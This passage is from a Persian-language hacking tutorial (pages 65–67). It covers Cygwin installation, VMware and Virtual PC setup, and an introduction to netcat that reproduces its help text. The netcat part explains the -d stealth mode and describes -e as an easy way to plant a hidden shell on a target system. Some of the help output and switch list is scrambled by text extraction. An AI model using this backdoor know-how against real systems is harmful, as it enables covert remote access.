ﺏﺮﻧﺎﻣﻪ هﻢ اﺱﺖ ( -۴اﮔﺮ ﻣﻴﺨﻮاهﺪ دیﮕﺮ ﮐﺎرﺏﺮان ﻣﺎﺷﻴﻦ ﺷﻤﺎ از ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﻨﻨﺪ ﮔﺰیﻨﻪ All Userرا اﻧﺘﺨﺎب ﮐﻨﻴﺪ در ﻏﻴﺮ ایﻦ ﺻﻮرت ﮔﺰیﻨﻪ Just MEرا اﻧﺘﺨﺎب ﮐﻨﻴﺪ. -۵ﮔﺰیﻨﻪ DOSو Unixﻗﺎﻟﺐ ﺕﻮﻟﻴﺪ ﻓﺎیﻠﻬﺎی ﻣﺘﻦ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ) .ﻓﺮﻗﯽ ﺏﺎ هﻢ ﻧﺪارد ﺕﻮﺻﻴﻪ Unixاﺱﺖ( -۶ﮔﺰیﻨﻪ Local Package directoryهﻢ ﻣﺤﻞ وﺟﻮد ﻓﺎیﻞ هﺎی Packageﮐﻪ هﻤﺎن ﺏﺮﻧﺎﻣﻪ هﺎی ﻧﺼﺐ در ایﻦ ﺷﺒﻴﻪ ﺱﺎز اﺱﺖ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ. -٧در ﻗﺴﻤﺖ Select Packagesﺷﻤﺎ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻣﺠﻤﻮﻋﻪ ﻓﺎیﻠﻬﺎ و ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﮐﻪ داﻧﻠﻮد ﮐﺮدﻩ ایﺪ ﻣﺠﻤﻮﻋﻪ ای از ﺏﺮﻧﺎﻣﻪ هﺎ ﺏﺮای ﻧﺼﺐ در اﺧﺘﻴﺎر داریﺪ ﮐﻪ ﺏﺎ ﮐﻠﻴﺪ ﮐﺮدن روی ﮔﺰیﻨﻪ Viewاﻣﮑﺎن اﻧﺘﺨﺎب هﺮ ﮐﺪام از ﺏﺮﻧﺎﻣﻪ هﺎ ﺏﺮای ﺷﻤﺎ ﻓﺮاهﻢ ﻣﻴﺸﻮد. -٨ﺏﺎ زدن دﮐﻤﻪ Nextﺏﺮﻧﺎﻣﻪ ﺷﺮوع ﺏﻪ ﻧﺼﺐ ﺧﻮد ﻣﻴﮑﻨﺪ و در ﺁﺧﺮ ﮐﺎر هﻢ از ﺷﻤﺎ ﺏﺮای درﺱﺖ ﮐﺮدن ﻣﻴﺎن ﺏﺮ در روی ﺻﻔﺤﻪ و ﻣﻨﻮی Start از ﺷﻤﺎ ﺱﻮال ﻣﻴﮑﻨﺪ . -٩ﺏﺎ ﮐﻠﻴﺪ روی ﻣﻴﺎن ﺏﺮ ﺁن ﺏﺮﻧﺎﻣﻪ ﺷﺮوع ﺏﻪ ﮐﺎر ﻣﻴﮑﻨﺪ و ﺷﻤﺎ ﮐﺎﻣﻼ یﮏ ﺧﻂ ﻓﺮﻣﺎن ﻟﻴﻨﻮﮐﺲ ) ( Shellواﻗﻌﯽ داریﺪ در ویﻨﺪوز ﺧﻮدﺕﺎن !! اﮔﺮ از ایﻦ راهﯽ ﮐﻪ ﻣﻦ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﺧﻮﺷﺘﺎن ﻧﻴﺎﻣﺪﻩ ﻣﻴﺘﻮاﻧﻴﺪ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﻧﺼﺐ را ﺏﺎ ﺡﺠﻢ ٢۵٧ﮐﻴﻠﻮ ﺏﻴﺖ از ﺱﺎیﺖ Cygwin.comدریﺎﻓﺖ ﮐﺮدﻩ و ﺁن را اﺟﺮا ﮐﻨﻴﺪ .وﻟﯽ ﺡﺘﻤﺎ ﺏﻪ ایﻦ یﮑﯽ ﺕﻮﺻﻴﻪ ﻣﻦ ،ﮐﻪ در ﻣﺮﺡﻠﻪ دوم ﺏﻪ ﺟﺎی ﮔﺰیﻨﻪ Install from local directoryیﺎ ﮔﺰیﻨﻪ Install from internetاز ﮔﺰیﻨﻪ Download Without Installاﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﮐﻪ ﺏﺎ ایﻦ ﮐﺎر ﺷﻤﺎ Packageهﺎ را اول داﻧﻠﻮد ﻣﻴﮑﻨﻴﺪ ﺏﻌﺪ ﺏﻪ ﺷﻴﻮﻩ ﮐﻪ ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم ﺏﺮﻧﺎﻣﻪ را ﻧﺼﺐ ﻣﻴﮑﻨﻴﺪ اﻟﺒﺘﻪ در ایﻦ ﺷﻴﻮﻩ ﮐﻪ ﻣﻦ اﺻﻼ ﺕﻮﺻﻴﻪ ﻧﻤﻴﮑﻨﻢ اﮔﺮ ﺧﺪای ﻧﮑﺮدﻩ اﺕﻔﺎﻗﯽ از هﺮ ﻧﻮع ﺏﯽ اﻓﺘﺪ اﻣﮑﺎن ﺷﺮوع دوﺏﺎرﻩ ﮐﺎر از اول اﺱﺖ و ﺷﻤﺎ هﻤﻪ ﺏﺮﻧﺎﻣﻪ هﺎیﯽ را ﮐﻪ دریﺎﻓﺖ ﮐﺮدﻩ ایﺪ از دﺱﺖ ﻣﻴﺪهﻴﺪ .ﺏﻘﻴﻪ ﮐﺎر ﺏﻌﺪ از اﺕﻤﺎم اﻧﺘﺨﺎب ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪ داﻧﻠﻮد ﺁن ﻣﺜﻞ ﺷﻴﻮﻩ ﺏﺎﻻ اﺱﺖ . ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺷﻤﺎ ﻣﯽ ﺕﻮاﻧﻴﺪ ﺏﺮﻧﺎﻣﻪ ﻧﺼﺐ را هﺮ ﭼﻘﺪر ﺏﺨﻮاهﻴﺪ اﺟﺮا ﮐﻨﻴﺪ و ﺏﺮﻧﺎﻣﻪ داﻧﻠﻮد ﮐﻨﻴﺪ و ﺏﻌﺪ ﻧﺼﺐ ﮐﻨﻴﺪ یﺎ ﺏﺮﻧﺎﻣﻪ ﺧﺎﺻﯽ را ﺡﺬف ﮐﻨﻴﺪ یﺎ هﻤﻪ را ﺡﺬف ﮐﻨﻴﺪ. ﺧﻮب ایﻦ ﺏﺮﻧﺎﻣﻪ واﻗﻌًﺎ ﺷﺎهﮑﺎر اﺱﺖ ﭼﻮن ﺏﻌﺪ از اﺟﺮای ﺁن ﮐﻪ یﮏ ﺧﻂ ﻓﺮﻣﺎن ﺱﺎدﻩ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ﮐﻪ اﺟﺎزﻩ اﺟﺮای هﻤﻪ ﺏﺮﻧﺎﻣﻪ هﺎی ویﻨﺪوز و ﻟﻴﻨﻮﮐﺲ ﺡﺘﯽ ﮔﺮاﻓﻴﮑﯽ هﺎ را در ان ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ﮐﻪ ایﻦ ﺷﮑﻠﯽ :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٥
ﺧﻮب ﺏﻘﻴﻪ ﮐﺎرا را ﺧﻮدﺕﺎن ﻣﻴﺪاﻧﻴﺪ ﺏﻪ ﻣﻦ رﺏﻄﯽ ﻧﺪارد ﺏﺎ ایﻦ ﻣﻴﺨﻮاهﻴﺪ ﭼﻪ ﮐﺎر ﮐﻨﻴﺪ ﻓﻘﻂ ایﻦ ﺏﮕﻢ ﺕﻤﺎم دﺱﺘﻮرهﺎی ﻟﻴﻨﻮﮐﺲ و ﺕﻤﺎم دﺱﺘﻮرهﺎی ویﻨﺪوز ﻓﻘﻂ در ایﻦ یﮏ وﺟﺐ ﺏﺎﻻ ﻣﯽ ﺁیﺪ اﻟﺒﺘﻪ ﺁﻧﻬﺎیﯽ ﮐﻪ ﻋﺎﺷﻖ ﻣﺤﻴﻂ X-Windowsﻟﻴﻨﻮﮐﺲ هﺴﺘﻦ ﺏﮕﻢ ﮐﻪ ﺏﺮیﺪ ﮐﺪ هﺎی ﺁن را داﻧﻠﻮد ﮐﻨﻴﺪ ﺏﻌﺪ ﺏﻴﺎد ایﻦ ﺕﻮ ﻧﺼﺐ ﮐﻨﻴﺪ ﺕﺎ واﻗﻌًﺎ یﮏ ﻟﻴﻨﻮﮐﺲ داﺷﺘﻪ ﺏﺎﺷﻴﺪ ﺏﺮای ﺁﻧﻬﺎیﯽ هﻢ ﮐﻪ ﻣﺜﻞ ﻣﻦ هﺴﺘﻦ و ﺧﻂ ﻓﺮﻣﺎن را دوﺱﺖ دارن ﻓﮑﺮ ﮐﻨﻢ هﻤﻴﻦ ﺏﺲ ﺏﺎﺷﺪ و ﭘﻮل اﺽﺎﻓﯽ ﺏﺮای داﻧﻠﻮد ﻧﺪارﻧﺪ ﺏﺪن !! ﻣﻌﺮﻓﯽ ﺑﺮﻧﺎﻣﻪ ﻣﻌﺮوف : VM WARE ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﻮﻟﯽ اﺱﺖ ) ﭘﺲ ﻣﻦ ﺏﺎ زیﺎد ﺁن ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ !! ( ﻧﺴﺒﺖ ﺏﻪ هﻢ ﮐﺎران ﺧﻮد در ایﻦ ﺻﻨﻒ ﻣﻴﺸﻮد ﮔﻔﺖ یﮏ وﺟﺐ ﺏﺎﻻﺕﺮ اﺱﺖ از ﺏﻘﻴﻪ اﻟﺒﺘﻪ از Microsoft virtual pcﻣﻴﺸﻮد ﮔﻔﺖ یﮏ ١٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠٠ﺱﺎل ﻧﻮری ﺏﺎﻻﺕﺮ اﺱﺖ. ﺁﺧﺮیﻦ ﻧﺴﺨﻪ ﺁن ﻧﺴﺨﻪ ۵ﺏﺎیﺪ ﺏﺎﺷﺪ ﮐﻪ ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺡﺎﻻ ) در ایﻦ زﻣﺎن ( ﻧﺴﺨﻪ ﺁﻟﻔﺎ ﺁن هﻢ ﺁﻣﺪﻩ ﺏﺎﺷﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺷﻤﺎ ﺏﻌﺪ از ﻧﺼﺐ ﺧﻮدش!! اﺟﺎزﻩ ﻧﺼﺐ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی ویﻨﺪوز )ﺕﻤﺎم ﻧﺴﺨﻪ هﺎ( و ﻟﻴﻨﻮﮐﺲ ) %٩٩٫٩٩٩٩ﻧﺴﺨﻪ هﺎ( را ﺏﻪ ﺷﻤﺎ در درون ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺧﻮدﺕﺎن ﮐﻪ ﻣﻤﮑﻦ اﺱﺖ ﻟﻴﻨﻮﮐﺲ یﺎ ویﻨﺪوز ﺏﺎﺷﺪ ،ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ. ایﻦ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻠﯽ ﮐﻪ ﺏﻪ ایﻦ ﺻﻮرت ﻧﺼﺐ ﻣﻴﮑﻨﻴﺪ واﻗﻌًﺎ در ﺷﺒﮑﻪ ﺏﻪ ﻋﻨﻮان یﮏ ﻣﺎﺷﻴﻦ ﺡﻘﻴﻘﯽ در ﺷﺒﮑﻪ ﺷﻨﺎﺧﺘﻪ ﻣﻴﺸﻮد یﮏ ﮐﻤﯽ دﻧﮓ ﻓﻨﮓ ﺁن ﺏﺮای ﺷﺒﮑﻪ ﮐﺮدن ﻣﺎﺷﻴﻦ ﻣﺠﺎزی ﺏﺎ ﻣﺎﺷﻴﻦ ﺡﻘﻴﻘﯽ ﺧﻮدﺕﺎن زیﺎد اﺱﺖ ﮐﻼ ﺱﻪ ﺡﺎﻟﺖ ﺏﺮای ایﻦ ﮐﺎر ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ ؛ ﺡﺎﻟﺖ اول اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ Use Bridged Networkingاﺱﺖ ﮐﻪ یﮏ ﮐﺎرت ﺷﺒﮑﻪ ﻣﺠﺎزی ﺏﺮای ﺷﻤﺎ و ﻣﺎﺷﻴﻦ ﻣﺠﺎزی ﻧﺼﺐ ﻣﻴﮑﻨﺪ و ﺏﻘﻴﻪ ﮐﺎر هﺎی ﺷﺒﮑﻪ هﻢ ﻣﺜﻞ روال ﻣﻌﻤﻮل اﺱﺖ و اﻟﺒﺘﻪ در ایﻦ ﺡﺎﻟﺖ ﺏﺎیﺪ ﺷﻤﺎ ﺏﻪ ﺁن یﮏ IPﺧﺎص .ﺡﺎﻟﺖ دوم ﮐﻪ ﺏﺮای ﻣﺎ ایﺮاﻧﯽ هﺎ ﺏﻬﺘﺮ اﺱﺖ !!! اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ Use Network Address Translationﮐﻪ ﺏﻪ اﺧﺘﺼﺎر NATﻣﻴﮕﻮیﻨﺪ اﺱﺖ در ایﻦ ﻣﻮﻗﻊ هﺮ وﻗﺖ ﺕﻮﺱﻂ رایﺎﻧﻪ ﺡﻘﻴﻘﯽ ﺏﻪ ﺷﺒﮑﻪ وﺻﻞ ﺷﺪیﺪ رایﺎﻧﻪ ﻣﺠﺎزی ﺱﻌﯽ ﻣﻴﮑﻨﺪ یﮏ ﺁدرس IPاز ISPﺷﻤﺎ ﺏﮕﻴﺮد ﮐﻪ در اﮐﺜﺮ ﻣﻮاﻗﻊ ) ﺏﻴﺶ از (%٩٠ﻧﺎﮐﺎم ﻣﻴﻤﺎﻧﺪ و ﺷﻤﺎ هﻢ DICﻣﻴﺸﻮیﺪ ﭼﻮن ﻣﻌﻤﻮﻻ ISPهﺎ ﮐﺎرت اﺷﺘﺮاک ﺧﻮد را ﻓﻘﻂ ﺏﺮای اﺕﺼﺎل یﮏ ﮐﺎﻣﭙﻴﻮﺕﺮ ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻴﮑﻨﻨﺪ ﻧﻪ ﭼﻨﺪ ﺕﺎ ،ﮐﻪ اﺱﺮار در ایﻦ ﮐﺎر ﻣﻤﮑﻦ اﺱﺖ ﺏﻪ ﻗﻄﻊ ﺷﺪن اﺷﺘﺮاک ﺷﻤﺎ ﻧﻴﺰ ﺏﯽ اﻧﺠﺎﻣﺪ .ﺡﺎﻟﺖ ﺱﻮم ﭘﺲ ﺏﻪ درد ﻣﺎ ﻣﻴﺨﻮرد در ایﻦ ﺷﻴﻮﻩ رایﺎﻧﻪ ﺡﻘﻴﻘﯽ ﺕﻘﺮیﺒﺎ ﻧﻘﺶ یﮏ ﺱﺮور را اﻧﺠﺎم ﻣﻴﺪهﺪ ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ هﻤﻪ رایﺎﻧﻪ هﺎی ﻣﺠﺎزی زیﺮ ﻣﺠﻤﻮﻋﻪ ایﻦ ﻣﺎﺷﻴﻦ ﻣﻴﺸﻮﻧﺪ و ﻣﺜﻼ اﮔﺮ درﺧﻮاﺱﺘﯽ ﺏﺮای دیﺪن یﮏ ﺻﻔﻪ وب از ﻃﺮف ﺁﻧﻬﺎ ﺏﺎﺷﺪ اول رایﺎﻧﻪ ﺷﻤﺎ ﺁن ﺻﻔﺤﻪ را از ISPﺧﻮدﺕﺎن ﻣﻴﮕﻴﺮد ﺏﻌﺪ ﻣﻴﺪهﺪ ﺏﻪ ﺁن ﻣﺎﺷﻴﻦ ﻣﺠﺎزی ) دﻗﻴﻘﺎ ﻣﺜﻞ %٩٩ﮐﺎﻓﯽ ﻧﻴﺖ هﺎ(. ﻧﮑﺘﻪ دیﮕﺮی ﮐﻪ در ﺏﺎرﻩ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻬﻢ اﺱﺖ ﺷﻴﻮﻩ ﺕﻘﺴﻴﻢ RAMاﺱﺖ ﺏﺎیﺪ ﺷﻤﺎ رم ﺧﻮد را اول ﻇﺮﻓﻴﺖ ﺁن را ﺕﻘﺴﻴﻢ ﺏﺮ دو ﮐﺮدﻩ و ﻋﺪد ﺡﺎﺻﻞ را ﺏﻪ ﺻﻮرت ﻣﺴﺎوی ﺏﻴﻦ ﺕﻌﺪاد ،ﻣﺎﺷﻴﻦ هﺎی ﻣﺠﺎزی ﮐﻪ ﻗﺴﻂ داریﺪ ﺏﻪ ﻃﻮر هﻢ زﻣﺎن از ﺁﻧﻬﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﻘﺴﻴﻢ ﮐﻨﻴﺪ ؛ اﮔﺮ ﻗﺴﻂ اﺱﺘﻔﺎدﻩ هﻢ زﻣﺎن از ﺁﻧﻬﺎ را ﻧﺪاریﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺼﻒ RAMﺧﻮد را ﺏﻪ ﺁن ﻣﺎﺷﻴﻦ ﻣﺠﺎزی اﺧﺘﺼﺎص دهﻴﺪ . ﺁﺧﺮیﻦ ﻧﮑﺘﻪ ایﻦ اﺱﺖ ﮐﻪ ﺷﻤﺎ روی هﺎرد ﺧﻮد یﮏ هﺎرد ﻣﺠﺎزی ایﺠﺎد ﻣﻴﮑﻨﺪ و ﻧﺒﺎیﺪ ﻧﮕﺮان اﺱﺘﻔﺎدﻩ از دﺱﺘﻮرات ﺧﻮﺏﯽ هﻤﭽﻮن Fdiskو.. ﺏﺎﺷﻴﺪ! ﻣﻌﺮﻓﯽ ﺑﺮﻧﺎﻣﻪ Connectix Virtual pcو : Microsoft virtual pc اول ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺏﺮﻧﺎﻣﻪ Connectix Virtual pcﺕﻮﺱﻂ ﻣﺎیﮑﺮوﺱﺎﻓﺖ ﺧﺮیﺪاری ﺷﺪﻩ و ﻧﺎم ﺁن ﺏﻪ Microsoft virtual pcﺕﻐﻴﻴﺮ ﭘﻴﺪا ﮐﺮدﻩ و اﻟﺒﺘﻪ ﺏﺪﺕﺮ هﻢ ﺷﺪﻩ !! ﭘﺲ دﻧﺒﺎل ﻧﺴﺨﻪ ﻗﺪیﻤﯽ Connectixﺏﮕﺮدیﺪ ﮐﻪ ﻓﮑﺮ ﮐﻨﻢ ﺕﻮ ﺷﺒﮑﻪ هﻢ ﺧﻴﻠﯽ ﮐﻢ اﺱﺖ وﻟﯽ از ﻟﻴﻨﻮﮐﺲ ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٦
ایﻦ ﺏﻴﻠﯽ ﭘﺴﺖ ﻓﻄﺮت ﺏﻌﺪ از ﺧﺮیﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ و ﺕﻐﻴﻴﺮ اﺱﻢ ﺁن دیﮕﺮ از ﻟﻴﻨﻮﮐﺲ در ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﺸﺘﻴﺒﺎﻧﯽ ﻧﻤﻴﮑﻨﺪ وﻟﯽ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ در ایﻦ ﺏﺮﻧﺎﻣﻪ ﻟﻴﻨﻮﮐﺲ ﻧﺼﺐ ﮐﻨﻴﺪ وﻟﯽ اﻣﮑﺎﻧﺎت ﺷﺒﮑﻪ در اﺧﺘﻴﺎر ﺷﻤﺎ ﻧﻴﺴﺖ ) ﺏﻴﻠﯽ ﻣﻴﮑﺸﻢ ﺕﻮ را !!!!(. ﻧﺴﺨﻪ Connectixﺁن واﻗﻌًﺎ ﻣﺤﺸﺮ ﺏﻮد در ایﻦ ﺱﺎدﮔﯽ ﮐﺎرایﯽ ﺧﻮﺏﯽ داﺷﺖ وﻟﯽ ....ﺏﮕﺬریﻢ ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺧﻴﻠﯽ ﺱﺎدﻩ اﺱﺖ و اﺻﻼ ﻧﻴﺎز ﺏﻪ ﺕﻮﺽﻴﺢ ﻧﺪارد و ﺏﺪ ﻧﻴﺴﺖ ﮐﻤﯽ ﺕﺠﺮﺏﻪ ﮐﺴﺐ ﮐﻨﻴﺪ ﺏﺎ ﺁن .ﻗﺴﻤﺖ ﺷﺒﮑﻪ ﺁن ﺕﻘﺮیﺒﺎ ﻣﺜﻞ VMاﺱﺖ و ﺕﻮﺽﻴﺢ هﻢ ﻧﻤﻴﺨﻮاهﺪ .ﻣﺸﮑﻞ ﺕﺨﺼﻴﺺ رم هﻢ ﻧﺪارد وﻟﯽ اﺻﻮﻻ ﺷﺒﻴﻪ VMاﺱﺖ و ﺏﺪ ﻧﻴﺴﺖ از ﻓﺮﻣﻮﻟﯽ ﮐﻪ ﺏﺎﻻ ﺏﻪ ﺷﻤﺎ هﺎ یﺎد دادم ﺏﺮای ﭘﺎیﺪاری ﻣﺎﺷﻴﻦ ﺧﻮدﺕﺎن و ﻣﺎﺷﻴﻦ ﻣﺠﺎزی از ﺁن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ . ﺽﻤﻴﻤﻪ ﺷﺸﻢ ؛ ﻣﻌﺮﻓﯽ اﺏﺰار NCیﺎ ﺏﺎ ﻧﺎم ﮐﺎﻣﻞ : Net Cat یﮏ اﺏﺰار هﻤﻪ ﮐﺎرﻩ اﺱﺖ .ﺏﺎیﺪ ﺧﻴﻠﯽ ﭘﻴﺶ از ایﻦ ،ایﻦ اﺏﺰار ﻣﻌﺮﻓﯽ ﻣﻴﮑﺮدم وﻟﯽ ﻧﻤﻴﺪاﻧﺴﺘﻢ ﮐﻪ ﮐﺠﺎ ﺏﺎیﺪ درﺏﺎرﻩ ﺁن ﺕﻮﺽﻴﺢ ﺏﺪهﻢ .هﻤﻴﺸﻪ ﮐﺎر راﻩ ﻣﯽ اﻧﺪازد .دارای یﮏ ﺱﺮی ﺱﻮیﭻ اﺱﺖ ﮐﻪ هﻤﻪ را ﺕﻮﺽﻴﺢ ﮐﺎﻣﻞ ﻣﻴﺪهﻢ اﻟﺒﺘﻪ ﭼﻮن ﻣﻴﺪاﻧﻢ ﺏﻪ ﮐﺎر ﺷﻤﺎ هﺎ ﺧﻮاهﺪ ﺁﻣﺪ ﻣﻴﮕﻮیﻢ!! هﻤﻪ ﮐﺎرﻩ اﺱﺖ ،از ﭘﻮیﺶ ﭘﻮرت ﮔﺮﻓﺘﻪ ﺕﺎ یﮏ اﺱﺐ ﺕﺮوا ﻣﺮگ ﺏﺎر ﺕﺎ یﮏ ﻧﺮم اﻓﺰار ﺏﺮای ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت و ....دوﺱﺖ دارم ﺁن را ﭼﻮن واﻗﻌًﺎ ﻻیﻖ ایﻦ دوﺱﺖ داﺷﺘﻦ اﺱﺖ. C:\amir>nc -h ][v1.10 NT connect to somewhere: nc [-options] hostname port[s] [ports] ... ]listen for inbound: nc -l -p port [options] [hostname] [port options: -d detach from console, stealth mode -e prog ]!!inbound program to exec [dangerous -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v ]verbose [use twice to be more verbose -w secs timeout for connects and final net reads -z ]zero-I/O mode [used for scanning ]port numbers can be individual or ranges: m-n [inclusive
١
ﺱﻮیﭻ -d
٢
>-e
ﺕﻮﺽﻴﺤﺎت ایﻦ ﮔﺰیﻨﻪ ﺕﻨﻬﺎ ﺕﺤﺖ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز ﻗﺎﺏﻞ ﺏﻬﺮﻩ ﺏﺮداری ﺏﻮدﻩ و ﺏﺎﻋﺚ ﻣﯽ ﺷﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ tNetcaدر ﺡﺎﻟﺖ ﻣﺨﻔﯽ ) یﺎ اﺻﻄﻼﺡﺎ ( stealth modeﻓﻌﺎﻟﻴﺖ ﻧﻤﺎیﺪ ؛ ﺏﺪیﻦ ﻣﻌﻨﯽ ﮐﻪ ﺏﻪ ﻃﻮر ﻣﺠﺰا از اﻋﻼن MS-DOSﺏﻪ اﺟﺮا درﺁیﺪ .ایﻦ ﮔﺰیﻨﻪ ﺏﻪ ﺏﺮﻧﺎﻣﻪ Netcatاﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﺏﺪون ﻧﻴﺎز ﺏﻪ ﺏﺎز ﻧﮕﻪ داﺷﺘﻦ ﭘﻨﺠﺮﻩ اﻋﻼن MS-DOS ،در ﺡﺎﻟﺖ ﺁﻣﺪﻩ یﺎ ﮔﻮش ﺏﻪ زﻧﮓ ) ( Mode Listeningﺏﻪ ﻓﻌﺎﻟﻴﺖ ﺧﻮد اداﻣﻪ دهﺪ .هﻤﭽﻨﻴﻦ ﮔﺰیﻨﻪ ﻣﻮرد ﺏﺤﺚ اﻃﻤﻴﻨﺎن ﺏﻬﺘﺮی را درﺏﺎرﻩ ﻓﻌﺎﻟﻴﺖ ﺏﺮﻧﺎﻣﻪ Netcatﺏﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺪهﺪ. در ﺻﻮرﺕﯽ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ncﺕﻮﺱﻂ ﮔﺰیﻨﻪ gaping_security_holeﮐﺎﻣﭙﺎیﻞ ﺷﺪﻩ ﺏﺎﺷﺪ ،هﺮ ﺏﺎر ﮐﻪ ﺏﺮﻧﺎﻣﻪ ای از ﻃﺮیﻖ یﮏ ﭘﻮرت ﺏﻪ ﺧﺼﻮص اﻗﺪام ﺏﻪ ﺏﺮﻗﺮاری اﺕﺼﺎل ﺏﺎ ﮐﺎﻣﭙﻴﻮﺕﺮی ﻣﯽ ﮐﻨﺪ ﮐﻪ ﻋﻬﺪﻩ دار ﻣﻴﺰﺏﺎﻧﯽ ﺏﺮﻧﺎﻣﻪ NC اﺱﺖ ،ﻧﻤﻮﻧﻪ ﺁﻣﺪﻩ ﺏﻪ ﮐﺎر از ایﻦ ﺏﺮﻧﺎﻣﻪ ﮐﻪ ﺏﺮ روی ﺁن ﭘﻮرت ﮔﻮش ﺏﻪ زﻧﮓ اﺱﺖ ﻓﺮﻣﺎن commandرا اﺟﺮا ﺧﻮاهﺪ ﮐﺮد ،ایﻦ در ﺡﺎﻟﯽ اﺱﺖ ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCدر ﺱﻤﺖ ﮐﻼیﻨﺖ ﺟﺮیﺎن ورودی و ﺧﺮوﺟﯽ و یﺎ I/Oرا از ﻃﺮیﻖ ﺧﻂ ﻟﻮﻟﻪ ای ﻣﺠﺎزی ﺏﻪ ﻧﻤﻮﻧﻪ دیﮕﺮی از ﺏﺮﻧﺎﻣﻪ NCﮐﻪ در ﺟﺎی دیﮕﺮی ﮔﻮش ﺏﻪ زﻧﮓ و ﺁﻣﺎدﻩ اﺱﺖ ارﺱﺎل ﻣﻴﮑﻨﺪ .اﺱﺘﻔﺎدﻩ از ایﻦ ﻗﺎﺏﻠﻴﺖ ﻓﻮق اﻋﺎدﻩ ﺧﻄﺮﻧﺎک اﺱﺖ ﻣﮕﺮ ایﻨﮑﻪ ﺏﻪ ﻓﺮایﻨﺪ در ﺡﺎل اﺟﺮا ﮐﺎﻣﻼ ﻣﺸﺮف ﺏﺎﺷﻴﺪ .ﺏﻬﺮﻩ ﮔﺮی از ایﻦ ﮔﺰیﻨﻪ روش ﺁﺱﺎن ﺏﺮای راﻩ اﻧﺪازی یﮏ shellﻣﺨﻔﯽ ﺏﺮ روی یﮏ ﺱﻴﺴﺘﻢ ﻧﻤﻮﻧﻪ ﺏﻪ ﻣﻨﻈﻮر اﺟﺮای ﻓﺮﻣﺎﻧﻬﺎی ﻣﻮرد ﻧﻈﺮ ﻣﺤﺴﻮب ﻣﻴﺸﻮد.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !! ٣
>-i<second
۴
>-g
۵
>-G
۶
-l
٧
-L
٨
-n
٩
>-o
١٠
>-p<port
ﺻﻔﺤﻪ
٦٧
